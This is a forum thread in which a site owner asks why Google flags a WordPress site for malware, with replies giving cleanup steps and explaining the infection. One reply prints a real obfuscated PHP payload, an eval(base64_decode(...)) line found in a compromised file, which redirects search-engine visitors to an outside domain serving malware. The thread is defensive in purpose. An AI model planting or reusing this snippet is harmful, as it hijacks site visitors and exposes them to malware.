: Google says my site contains malware my clients site http://bit.ly/dTOfGF (i used url shortener). I have tried everything to find the malware but i couldnt. I tried the Google checklist http://googlewebmastercentral.blogspot.c

@Angela700

It's more than likely your WordPress install has been compromised.

The permanent fix is to follow these steps to ensure it is fully cleaned and to prevent a recurrence. This is the best method to ensure it is 100% clean.


Backup the database
Make a note of the customizations, such as plugins or any other modifications you’ve made.
Remove all files from the site, be sure to save anything that isn’t part of WordPress!
Reinstall WordPress
Restore the database
Verify the WordPress users are correct and authorized
Re-install any plugins you were using
Reload any additional .php files from known clean copy


This is the best way to ensure the site was not attacked previously and has hidden backdoors loaded deep into the site.

It is extremely important to keep your WordPress software up to date and use strong passwords for your WP admin, FTP and Database, and that you don’t use the same password for all of them.

Additional information: GoDaddy case study

Vote Up Vote Down

@Deb1703797

This was in a php file that had chmod 666

eval(base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJnb29nbGUiKSkgewoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sIi5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJzaXRlIikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImludXJsIikpewoJCXByZWdfbWF0Y2ggKCIvcVw9KC4qKS8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsKCQlpZiAoc3RyaXN0cigka2tbMV0sIiYiKSkgewoJCQlwcmVnX21hdGNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOwoJCQkka2V5d29yZD11cmxkZWNvZGUoJGtleTJbMV0pOwoJCX1lbHNlIHsKCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRra1sxXSk7CgkJfQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRrZXl3b3JkKTsKCQlleGl0KCk7Cgl9Cgp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlhaG9vIikpIHsKcHJlZ19tYXRjaCAoIi9wXD0oLio/KSYvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7CgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2ZnbmZkZnRocnYuYmVlLnBsLz9xPSIuJGtrWzFdKTsKCQlleGl0KCk7Cn1lbHNlaWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7CnByZWdfbWF0Y2ggKCIvcVw9KC4qPykmLyIsJF9TRVJWRVJbS FRU UF9SRUZFUkVSXSwka2spOwoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRra1sxXSk7CgkJZXhpdCgpOwp9Cgk="));


It only showed when it was visited through google yahoo or bing so i couldnt of seen the malware...

Vote Up Vote Down

@Sarah324

Remake those images, maybe even using screenshots, and re-save them and replace them in your site. Any malware hidden in them will be removed that way.

Update

That snippet contained code that, if a user found your site through Google, Yahoo, or Bing search, redirected users to a site in Poland that serves up a fake search page and tries to load malware on to a user's computer.

Vote Up Vote Down